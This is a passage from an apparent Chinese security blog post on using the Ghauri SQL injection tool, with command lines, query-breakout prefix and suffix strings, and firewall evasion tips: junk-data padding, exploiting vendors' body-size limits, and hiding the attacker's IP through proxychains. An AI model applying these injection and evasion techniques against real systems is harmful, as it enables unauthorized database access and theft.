<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">--prefix <span class="hljs-string">&quot;&#x27;)/**/     # 在每个 payload 前添加自定义字符串，帮助跳出原始查询上下文。</span><br><span class="hljs-string">--suffix &quot;</span>--+        <span class="hljs-comment"># 附加 SQL 注释以安全终止原始查询的剩余部分。</span><br>--skip-urlencode     <span class="hljs-comment"># 跳过 payload 数据的 URL 编码。</span><br>--confirm            <span class="hljs-comment"># 在继续利用之前验证和确认注入的 payload。</span><br>proxychains          <span class="hljs-comment"># 通过代理路由所有流量，隐藏真实 IP 并规避基于 IP 的封锁或速率限制。</span><br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">ghauri -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --batch --dbs --level 3 --dbms mysql --confirm --time-sec 10 --delay 5<br><br>ghauri -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --dbs --batch --level 3 --dbms mysql --tech=T --level 3 --confirm --time-sec 10 --delay 5<br><br>proxychains ghauri -u <span class="hljs-string">&quot;vulnerable_url&quot;</span> -p param --batch --dbs --confirm --level 3 --time-sec 10<br><br>ghauri -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --dbs --level 3 --batch --dbms=mysql --random-agent --confirm<br></code></pre></td></tr></table></figure>

<h4 id="利用垃圾数据绕过-Fortinet-WAF"><a href="#利用垃圾数据绕过-Fortinet-WAF" class="headerlink" title="利用垃圾数据绕过 Fortinet WAF"></a>利用垃圾数据绕过 Fortinet WAF</h4><p>发送大量 1K 垃圾数据来迷惑 WAF，使后端以不同方式处理请求，从而使 payload 悄然通过。</p>
<h4 id="可被利用的-WAF-检测限制"><a href="#可被利用的-WAF-检测限制" class="headerlink" title="可被利用的 WAF 检测限制"></a>可被利用的 WAF 检测限制</h4><p>这些各厂商特有的请求体大小限制可以被利用——通过发送超过 WAF 完整检测大小的 payload，使 SQLi 部分绕过检测，而后端仍能正常处理。</p>
<table>
<thead>
<tr>
<th>WAF 提供商</th>
<th>最大请求体检测大小</th>
</tr>
</thead>
<tbody><tr>
<td>Cloudflare</td>
<td>128 KB（规则集引擎），最高 500 MB（企业版）</td>
</tr>
<tr>
<td>AWS WAF</td>
<td>8 KB – 64 KB（按服务可配置）</td>
</tr>
<tr>
<td>Akamai</td>
<td>8 KB – 128 KB</td>
</tr>
<tr>
<td>Azure WAF</td>
<td>128 KB</td>
</tr>
<tr>
<td>FortiWeb (Fortinet)</td>
<td>100 MB</td>
</tr>
<tr>
<td>Barracuda WAF</td>
<td>64 KB</td>
</tr>
<tr>
<td>Sucuri</td>
<td>10 MB</td>
</tr>
<tr>
<td>Radware AppWall</td>
<td>最高 1 GB（云端 WAF）</td>
</tr>
<tr>
<td>F5 BIG-IP WAAP</td>
<td>20 MB（可配置）</td>
</tr>
<tr>
<td>Palo Alto</td>
<td>10 MB</td>
</tr>
<tr>
<td>Google Cloud Armor</td>
<td>8 KB（可增加至 128 KB）</td>
</tr>
</tbody></table>
<h4 id="Ghauri-WAF-绕过技巧（亲测有效）"><a href="#Ghauri-WAF-绕过技巧（亲测有效）" class="headerlink" title="Ghauri WAF 绕过技巧（亲测有效）"></a>Ghauri WAF 绕过技巧（亲测有效）</h4><ul>
<li>使用 <code>--confirm</code> 重新验证 payload 并减少误报。</li>
<li>使用 <code>--delay</code> 减慢请求速度，避免速率限制或基于行为的封锁。</li>
<li>使用 <code>proxychains</code> 配合住宅 IP 以获得更好的 WAF 绕过效果。</li>
<li>将 <code>--level</code> 提高到 3 以扩大注入测试深度。</li>
<li>如果 <code>--dbs</code> 没有返回结果，尝试 <code>--current-user</code>、<code>--current-db</code> 和 <code>--hostname</code> 来确认注入。</li>
<li>使用 <code>--ignore-code</code> 跳过被封锁的 HTTP 响应（例如 401 或 403）。</li>
<li>当后端 DBMS 已知时使用 <code>--dbms</code>，强制 Ghauri 专注于该引擎以获得更快更精确的结果。</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Sqlmap-Ghauri</div>
      <div>https://xiaobite-hacker.github.io/2026/02/22/SQLMap-Ghauri/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>xiaobite</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年2月22日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/02/22/SQLMap-%E4%BD%BF%E7%94%A8%E6%89%8B%E5%86%8C/" title="Sqlmap-使用手册">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Sqlmap-使用手册</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/02/19/naabu-%E4%BD%BF%E7%94%A8%E6%89%8B%E5%86%8C/" title="Naabu-使用手册">
                        <span class="hidden-mobile">Naabu-使用手册</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
